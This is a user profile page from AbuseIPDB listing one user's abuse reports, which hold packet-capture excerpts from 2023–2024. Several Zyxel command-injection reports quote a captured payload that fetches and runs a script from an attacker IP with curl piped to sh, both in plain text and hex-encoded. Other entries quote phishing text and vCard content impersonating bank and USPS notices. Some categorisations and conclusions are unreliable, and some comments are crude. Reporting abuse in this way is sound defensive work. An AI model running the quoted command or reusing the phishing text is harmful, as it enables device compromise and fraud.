xxxDEV1xxx - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User xxxDEV1xxx joined AbuseIPDB in March 2022 and has reported 1,031 IP addresses.

Standing (weight) is good.

INACTIVE USER

IP	Date	Comment	Categories
🇹🇼 220.130.163.172	30 Apr 2024	4/30/24 13:22:16.269 PST src port:52612 dst port: 23 previous packet received was also dst port 2 ... show more 4/30/24 13:22:16.269 PST src port:52612 dst port: 23 previous packet received was also dst port 23 from 27.11.3.231 show less	DNS Compromise Hacking
🇨🇳 27.11.3.231	30 Apr 2024	4/30/24 13:22:13.084177 PST src port: 9328 dst port: 23 previous malformed packet was also from c ... show more 4/30/24 13:22:13.084177 PST src port: 9328 dst port: 23 previous malformed packet was also from chinaunicom.com 103.56.61.144 show less	DNS Compromise Hacking
🇨🇳 103.56.61.144	30 Apr 2024	4/30/24 13:22:02.910747 PST UDP src port:42070 dst port: 69 Malformed packet TFTP opcode (6) O ... show more 4/30/24 13:22:02.910747 PST UDP src port:42070 dst port: 69 Malformed packet TFTP opcode (6) Option: \001 = Option name: \x01 Option value: Option: \001 = Option name: \x01 Option value: Option: = Option name: Option value: Option: = Option name: Option value: Option: \aversion\004bind = Option name: \aversion\x04bind Option value: show less	DNS Compromise Hacking
🇫🇷 103.102.230.2	30 Apr 2024	4/30/24 13:21:57 PST src port: 57406 dst port: 8728 SYN followed by a malformed packet incomin ... show more 4/30/24 13:21:57 PST src port: 57406 dst port: 8728 SYN followed by a malformed packet incoming from 103.56.61.144 dst UDP 69 show less	DNS Compromise Hacking
🇮🇹 129.152.29.126	30 Apr 2024	4/30/24 13:18:00.372152 Type 8 Echo (ping) request	DNS Compromise Ping of Death Hacking
🇷🇺 176.99.236.4	30 Apr 2024	4/30/24 09:30:22.890591 PST src port: 58724 dst port: 23	Hacking SSH
🇹🇭 118.194.250.60	07 Apr 2024	Apr 7, 2024 11:02:09.501228 PST SrcPort:40374 DstPort:8899 Flags: 0x002 (SYN) The ISP allows t ... show more Apr 7, 2024 11:02:09.501228 PST SrcPort:40374 DstPort:8899 Flags: 0x002 (SYN) The ISP allows this traffic coming through for some reason. Doesn't matter what device is connected, they all are targeted, so it's not a machine misconfig or virus, it's all devices see this incoming even a switch connected to the modem mirroring everything to a capture with ipv4 and ipv6 disabled show less	Phishing Web Spam Hacking SQL Injection Brute-Force Bad Web Bot Exploited Host Web App Attack IoT Targeted
🇺🇦 92.63.197.224	07 Apr 2024	Apr 7, 2024 10:42:04.668639 PST First and foremost, suck my balls. SrcPort:54378 DstPort:49246 F ... show more Apr 7, 2024 10:42:04.668639 PST First and foremost, suck my balls. SrcPort:54378 DstPort:49246 Flags: 0x002 (SYN), Then target machine sends back Flags: 0x014 (RST, ACK) Then attacker machine sends Flags: 0x004 (RST) @ 10:42:04.900641 show less	DDoS Attack Phishing Port Scan Hacking SQL Injection Brute-Force Exploited Host IoT Targeted
🇨🇳 120.211.97.229	07 Apr 2024	Apr 6 2024 13:43:05.426408000 Pacific Daylight Time Flags: 0x03f (FIN, SYN, RST, PSH, ACK, URG) Sr ... show more Apr 6 2024 13:43:05.426408000 Pacific Daylight Time Flags: 0x03f (FIN, SYN, RST, PSH, ACK, URG) SrcPort:6695 DstPort:39479 Expert Info: This frame initiates the session closing. Options: Max segment size:1401 bytes SACK permitted Timestamps No-Operation (NOP) Window scale: 6 (multiply by 64) Urgent Pointer:35057 show less	DDoS Attack Port Scan Hacking Web App Attack
🇹🇼 114.35.10.61	07 Apr 2024	Apr 6 2024 15:30:25.899197000 Pacific Daylight Time Flags: 0x03f (FIN, SYN, RST, PSH, ACK, URG) Sr ... show more Apr 6 2024 15:30:25.899197000 Pacific Daylight Time Flags: 0x03f (FIN, SYN, RST, PSH, ACK, URG) SrcPort:9786 DstPort:31536 Expert Info: This frame initiates the session closing. Options: Max segment size:1402 bytes SACK permitted Timestamps No-Operation (NOP) Window scale: 6 (multiply by 64) Urgent Pointer:33198 show less	DDoS Attack Port Scan Hacking Web App Attack
🇺🇸 104.21.0.160	26 Oct 2023	3:44amPST 10/21/23 text from (588)938-6478, 588 is an unassigned areacode in the US. URL:s.id/VALUE ... show more 3:44amPST 10/21/23 text from (588)938-6478, 588 is an unassigned areacode in the US. URL:s.id/VALUELOADEDD created a group in Verizon Message+ with you and one other participants. (URL actually=http://ca-edd24hrs.com/load/a.vcf) a.vcf contents: BEGIN:VCARD VERSION:3.0 PRODID:-//Apple Inc.//macOS 13.4.1//EN N:DEBIT CARD;BANK OF AMERICA EDD;;; FN:VALUE LOAD ALERT NOTIFICATION ORG:VALUE LOAD ALERT NOTIFICATION; item1.TEL;type=pref:$3\,590 item1.X-ABLabel:𝐀𝐦𝐨𝐮𝐧𝐭: NOTE:You have a Pending value load fund which has not been added to your account.\n\nFunding Amount: $3\,590\nFunding Method: ACH\n\nPlease click on the EDD Value load approval link to approve the fund to your EDD Prepaid Debit Card. item2.URL;type=pref:s.id/visaprepaidprocessing-achapproval item2.X-ABLabel:𝐕𝐀𝐋𝐔𝐄 𝐋𝐎𝐀𝐃 𝐀𝐏𝐏𝐑𝐎𝐕𝐀𝐋 𝐋𝐈𝐍𝐊: X-ABShowAs:COMPANY END:VCARD Tracert ca-edd24hrs.com [104.21.0.160] 5.. 154.54.28.145 6.. 154.54.45.162 7.. 154.54.25.150 8.. 38.104.83.170 9.. 162.158.184.5 10..104.21.0.160 show less	DNS Compromise DNS Poisoning Fraud Orders Phishing Hacking
🇺🇸 188.114.96.1	26 Oct 2023	10/26/23 10:39am PST text/sms message phone number sending message is +44 7706 936052 Country cod ... show more 10/26/23 10:39am PST text/sms message phone number sending message is +44 7706 936052 Country code +44 is UK IP for usps.hostise.shop is American SAN FRANSISCO/Brazil hybrid, cloudflare reverse proxy. MESSAGE CONTENTS The USPS package has arrived at the warehouse and cannot be delivered due to incomplete address information. Please confirm your address in the link usps.hostise.shop ...THE LINK IN TEXT RESOLVES TO TWO CLOUDFLARE REVERSE PROXY LOCATIONS PS C:\Windows\system32> tracert -4 usps.hostise.shop Tracing route to usps.hostise.shop [188.114.96.1] over a maximum of 30 hops: 1 182 ms 184 ms 184 ms 2 184 ms 184 ms 184 ms 3 184 ms 194 ms 278 ms 185.1.55.41 4 183 ms 184 ms 182 ms 188.114.96.1 tracert -4 usps.hostise.shop 172.67.220.197 4 * * * Request timed out. 5 79 ms 80 ms 80 ms 154.54.93.102 6 118 ms 111 ms 109 ms 38.32.185.178 7 110 ms 111 ms 125 ms 172.70.40.3 8 109 ms 110 ms 109 ms 172.67.220.197 show less	DNS Compromise DNS Poisoning Fraud Orders Phishing Hacking
🇺🇸 172.67.220.197	26 Oct 2023	10/26/23 10:39am PST text/sms message phone number sending message is +44 7706 936052 Country cod ... show more 10/26/23 10:39am PST text/sms message phone number sending message is +44 7706 936052 Country code +44 is UK IP for usps.hostise.shop is American SAN FRANSISCO/Brazil hybrid, cloudflare reverse proxy. MESSAGE CONTENTS The USPS package has arrived at the warehouse and cannot be delivered due to incomplete address information. Please confirm your address in the link usps.hostise.shop ...THE LINK IN TEXT RESOLVES TO TWO CLOUDFLARE REVERSE PROXY LOCATIONS PS C:\Windows\system32> tracert -4 usps.hostise.shop Tracing route to usps.hostise.shop [188.114.96.1] over a maximum of 30 hops: 1 182 ms 184 ms 184 ms 2 184 ms 184 ms 184 ms 3 184 ms 194 ms 278 ms 185.1.55.41 4 183 ms 184 ms 182 ms 188.114.96.1 tracert -4 usps.hostise.shop 172.67.220.197 4 * * * Request timed out. 5 79 ms 80 ms 80 ms 154.54.93.102 6 118 ms 111 ms 109 ms 38.32.185.178 7 110 ms 111 ms 125 ms 172.70.40.3 8 109 ms 110 ms 109 ms 172.67.220.197 show less	DNS Compromise DNS Poisoning Fraud Orders Phishing Hacking
🇯🇵 101.203.74.13	24 Oct 2023	10/24/23 8:33am PST VPN hijacked and being routed to japan, this is the first hop after my vpn ip. ... show more 10/24/23 8:33am PST VPN hijacked and being routed to japan, this is the first hop after my vpn ip. physically impossible. 1 11 ms 10 ms 10 ms 10.41.18.1 2 12 ms 12 ms 11 ms 84.247.111.125 3 12 ms 12 ms 13 ms 101.203.74.13 4 13 ms 12 ms 12 ms 142.251.226.193 5 12 ms 12 ms 12 ms 142.250.226.109 6 12 ms 12 ms 12 ms dns.google [8.8.8.8] show less	DNS Compromise DNS Poisoning Fraud Orders Hacking
🇺🇸 104.21.0.160	21 Oct 2023	3:44amPST 10/21/23 text URL:s.id/VALUELOADEDD created a group in Verizon Message+ with you and one ... show more 3:44amPST 10/21/23 text URL:s.id/VALUELOADEDD created a group in Verizon Message+ with you and one other participants. (URL actually=http://ca-edd24hrs.com/load/a.vcf) a.vcf contents: BEGIN:VCARD VERSION:3.0 PRODID:-//Apple Inc.//macOS 13.4.1//EN N:DEBIT CARD;BANK OF AMERICA EDD;;; FN:VALUE LOAD ALERT NOTIFICATION ORG:VALUE LOAD ALERT NOTIFICATION; item1.TEL;type=pref:$3\,590 item1.X-ABLabel:𝐀𝐦𝐨𝐮𝐧𝐭: NOTE:You have a Pending value load fund which has not been added to your account.\n\nFunding Amount: $3\,590\nFunding Method: ACH\n\nPlease click on the EDD Value load approval link to approve the fund to your EDD Prepaid Debit Card. item2.URL;type=pref:s.id/visaprepaidprocessing-achapproval item2.X-ABLabel:𝐕𝐀𝐋𝐔𝐄 𝐋𝐎𝐀𝐃 𝐀𝐏𝐏𝐑𝐎𝐕𝐀𝐋 𝐋𝐈𝐍𝐊: X-ABShowAs:COMPANY END:VCARD Tracert ca-edd24hrs.com [104.21.0.160] 3.. 104.200.133.156 4.. te0-6-0-7-4.rcr21.b023003-0.phx01.atlas.cogentco.com 5.. 154.54.28.145 6.. 154.54.45.162 7.. 154.54.25.150 8.. 38.104.83.170 9.. 162.158.184.5 10..104.21.0.160 blowme show less	Fraud Orders Phishing Hacking
🇵🇱 193.34.212.225	08 Oct 2023	Oct 8, 2023 13:30:48.937879000 Pacific Daylight Time Zyxel cmd injection The attack was resulted ... show more Oct 8, 2023 13:30:48.937879000 Pacific Daylight Time Zyxel cmd injection The attack was resulted from \DEVICE\HARDDISKVOLUME3\WINDOWS\SYSTEM32\SVCHOST.EXE ¤LÈ¬I°¨nû/ÁEèÔ1ëR6Á"Ôá/ãôôÔxOzfPgvj) "Ì(hEYEPWGFEDURGKSJDJBBOIDOXGMNPNZJYJKXZOHIZRHKDKIJP";bash -c "curl 193.34.212.225/t \| sh";echo -n "HBpBnliv0CiLmY2Ss6yiZEyTx5q1xCMkRlM90PfZrXYz7ISxfFEnjKgwTHHdT61X6AUHE List of IPs performing same attack... 64.112.74.166 x 141.207.209.233 x 38.45.217.142 x 38.45.217.150 x 109.207.200.47 x 109.207.200.44 x 213.109.84.253 add one to the list 193.34.212.225 NOTIFICATIONDATA:4559455057474645445552474b534a444a42424f49444f58474d4e504e5a4a594a4b585a4f48495a52484b444b494a50223b62617368202d6320226375726c203139332e33342e3231322e3232352f74207c207368223b6563686f202d6e2022 NONCEDATA:4270426e6c69763043694c6d593253733679695a4579547835713178434d6b526c4d393050665a7258597a374953786646456e6a4b677754484864543631583641554845 show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇵🇱 193.34.212.225	08 Oct 2023	Oct 7, 2023 23:35:36.673106000 Pacific Daylight Time Zyxel cmd injection The attack was resulted ... show more Oct 7, 2023 23:35:36.673106000 Pacific Daylight Time Zyxel cmd injection The attack was resulted from \DEVICE\HARDDISKVOLUME3\WINDOWS\SYSTEM32\SVCHOST.EXE ¤LÈ¬I°¨nû/ÁEèÔ1ëR6Á"Ôá/ãôôÔxOzfPgvj) "Ì(hEYEPWGFEDURGKSJDJBBOIDOXGMNPNZJYJKXZOHIZRHKDKIJP";bash -c "curl 193.34.212.225/t \| sh";echo -n "HBpBnliv0CiLmY2Ss6yiZEyTx5q1xCMkRlM90PfZrXYz7ISxfFEnjKgwTHHdT61X6AUHE List of IPs performing same attack... 64.112.74.166 x 141.207.209.233 x 38.45.217.142 x 38.45.217.150 x 109.207.200.47 x 109.207.200.44 x 213.109.84.253 add one to the list 193.34.212.225 NOTIFICATIONDATA:4559455057474645445552474b534a444a42424f49444f58474d4e504e5a4a594a4b585a4f48495a52484b444b494a50223b62617368202d6320226375726c203139332e33342e3231322e3232352f74207c207368223b6563686f202d6e2022 NONCEDATA:4270426e6c69763043694c6d593253733679695a4579547835713178434d6b526c4d393050665a7258597a374953786646456e6a4b677754484864543631583641554845 show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇵🇱 193.34.212.225	07 Oct 2023	Oct 6, 2023 09:55:38.887209000 Pacific Daylight Time Zyxel cmd injection The attack was resulted ... show more Oct 6, 2023 09:55:38.887209000 Pacific Daylight Time Zyxel cmd injection The attack was resulted from \DEVICE\HARDDISKVOLUME3\WINDOWS\SYSTEM32\SVCHOST.EXE ¤LÈ¬I°¨nû/ÁEèÔ1ëR6Á"Ôá/ãôôÔxOzfPgvj) "Ì(hEYEPWGFEDURGKSJDJBBOIDOXGMNPNZJYJKXZOHIZRHKDKIJP";bash -c "curl 193.34.212.225/t \| sh";echo -n "HBpBnliv0CiLmY2Ss6yiZEyTx5q1xCMkRlM90PfZrXYz7ISxfFEnjKgwTHHdT61X6AUHE List of IPs performing same attack... 64.112.74.166 x 141.207.209.233 x 38.45.217.142 x 38.45.217.150 x 109.207.200.47 x 109.207.200.44 x 213.109.84.253 add one to the list 193.34.212.225 NOTIFICATIONDATA:4559455057474645445552474b534a444a42424f49444f58474d4e504e5a4a594a4b585a4f48495a52484b444b494a50223b62617368202d6320226375726c203139332e33342e3231322e3232352f74207c207368223b6563686f202d6e2022 NONCEDATA:4270426e6c69763043694c6d593253733679695a4579547835713178434d6b526c4d393050665a7258597a374953786646456e6a4b677754484864543631583641554845 show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇵🇱 193.34.212.225	06 Oct 2023	Oct 6,2023 12:58:10.536165 PDT Zyxel cmd injection The attack was resulted from \DEVICE\HARDDISKVO ... show more Oct 6,2023 12:58:10.536165 PDT Zyxel cmd injection The attack was resulted from \DEVICE\HARDDISKVOLUME3\WINDOWS\SYSTEM32\SVCHOST.EXE ¤LÈ¬I°¨nû/ÁEèÔ1ëR6Á"Ôá/ãôôÔxOzfPgvj) "Ì(hEYEPWGFEDURGKSJDJBBOIDOXGMNPNZJYJKXZOHIZRHKDKIJP";bash -c "curl 193.34.212.225/t \| sh";echo -n "HBpBnliv0CiLmY2Ss6yiZEyTx5q1xCMkRlM90PfZrXYz7ISxfFEnjKgwTHHdT61X6AUHE List of IPs performing same attack... 64.112.74.166 x 141.207.209.233 x 38.45.217.142 x 38.45.217.150 x 109.207.200.47 x 109.207.200.44 x 213.109.84.253 add one to the list 193.34.212.225 NOTIFICATION DATA:4559455057474645445552474b534a444a42424f49444f58474d4e504e5a4a594a4b585a4f48495a52484b444b494a50223b62617368202d6320226375726c203139332e33342e3231322e3232352f74207c207368223b6563686f202d6e2022 NONCEDATA:4270426e6c69763043694c6d593253733679695a4579547835713178434d6b526c4d393050665a7258597a374953786646456e6a4b677754484864543631583641554845 show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇵🇱 193.34.212.225	05 Oct 2023	Oct 5, 2023 09:13:36.329041000 Pacific Daylight Time Zyxel cmd injection Initiator SPI: 784f7a665 ... show more Oct 5, 2023 09:13:36.329041000 Pacific Daylight Time Zyxel cmd injection Initiator SPI: 784f7a665067766a Responder SPI: 0000000000000000 Next payload: Notify (41) Version: 2.0 Exchange type: IKE_SA_INIT (34) Flags: 0x08 (Initiator, No higher version, Request) Message ID: 0x00000000 Length: 204 Payload: Notify (41) - NO_PROPOSAL_CHOSEN Next payload: Nonce (40) 0... .... = Critical Bit: Not critical .000 0000 = Reserved: 0x00 Payload length: 104 Protocol ID: RESERVED (0) SPI Size: 0 Notify Message Type: NO_PROPOSAL_CHOSEN (14) NotificationDATA:4559455057474645445552474b534a444a42424f49444f58474d4e504e5a4a594a4b585a4f48495a52484b444b494a50223b62617368202d6320226375726c203139332e33342e3231322e3232352f74207c207368223b6563686f202d6e2022 Payload: Nonce (40) Next payload: NONE / No Next Payload (0) Payload length: 72 Nonce:4270426e6c69763043694c6d593253733679695a4579547835713178434d6b526c4d393050665a7258597a374953786646456e6a4b677754484864543631583641554845 show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇵🇱 193.34.212.225	22 Sep 2023	Arrival Time: Sep 22, 2023 06:42:50.300475000 PDT SCUMBAG Attempted Administrator Privilege Gain ... show more Arrival Time: Sep 22, 2023 06:42:50.300475000 PDT SCUMBAG Attempted Administrator Privilege Gain SERVER-WEBAPP Zyxel unauthenticated IKEv2 command injection attempt List of IPs performing same attack... 64.112.74.166 x 141.207.209.233 x 38.45.217.142 x 38.45.217.150 x 109.207.200.47 x 109.207.200.44 x 213.109.84.253 add one to the list 193.34.212.225 UDP SPORT 500 DPORT 500 Norton AV note...The attack was resulted from \DEVICE\HARDDISKVOLUME3\WINDOWS\SYSTEM32\SVCHOST.EXE Length: 212 Checksum: 0x0000 [zero-value ignored] [Stream index: 1329] [Timestamps] UDP payload (204 bytes) Internet Security Association and Key Management Protocol Initiator SPI: 784f7a665067766a Responder SPI: 0000000000000000 Next payload: Notify (41) Version: 2.0 Exchange type: IKE_SA_INIT (34) Flags: 0x08 (Initiator, No higher version, Request) Message ID: 0x00000000 Length: 204 Payload: Notify (41) - NO_PROPOSAL_CHOSEN Payload: Nonce (40) show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇷🇺 176.111.174.98	22 Sep 2023	Arrival Time: Sep 22, 2023 06:29:35.375596000 PDT	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇬🇧 109.205.213.74	22 Sep 2023	Arrival Time: Sep 22, 2023 06:17:42.628045000 PDT SYN	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇨🇳 183.134.104.171	21 Sep 2023	09/21/2023 14:20:57 PST SURICATA UDPv4 invalid checksum Generic Protocol Command Decode UDP SPORT ... show more 09/21/2023 14:20:57 PST SURICATA UDPv4 invalid checksum Generic Protocol Command Decode UDP SPORT 14722 DPORT 88 show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted
🇺🇦 92.63.197.153	17 Sep 2023	SCUMBAG Arrival Time: Sep 17, 2023 08:45:17.726487000 Pacific Daylight Time Acknowledgment Numbe ... show more SCUMBAG Arrival Time: Sep 17, 2023 08:45:17.726487000 Pacific Daylight Time Acknowledgment Number: 1822338335 [Expert Info (Note/Protocol): The acknowledgment number field is nonzero while the ACK flag is not set] Flags: 0x002 (SYN) 000. .... .... = Reserved: Not set ...0 .... .... = Accurate ECN: Not set .... 0... .... = Congestion Window Reduced: Not set .... .0.. .... = ECN-Echo: Not set .... ..0. .... = Urgent: Not set .... ...0 .... = Acknowledgment: Not set .... .... 0... = Push: Not set .... .... .0.. = Reset: Not set .... .... ..1. = Syn: Set [Expert Info (Chat/Sequence): Connection establish request (SYN): server port 80] .... .... ...0 = Fin: Not set [TCP Flags: ··········S·] TCP SPORT 30134 DPORT 80 show less	DNS Compromise DNS Poisoning Fraud Orders DDoS Attack FTP Brute-Force Ping of Death Phishing Fraud VoIP Open Proxy Web Spam Email Spam Blog Spam VPN IP Port Scan Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Exploited Host Web App Attack SSH IoT Targeted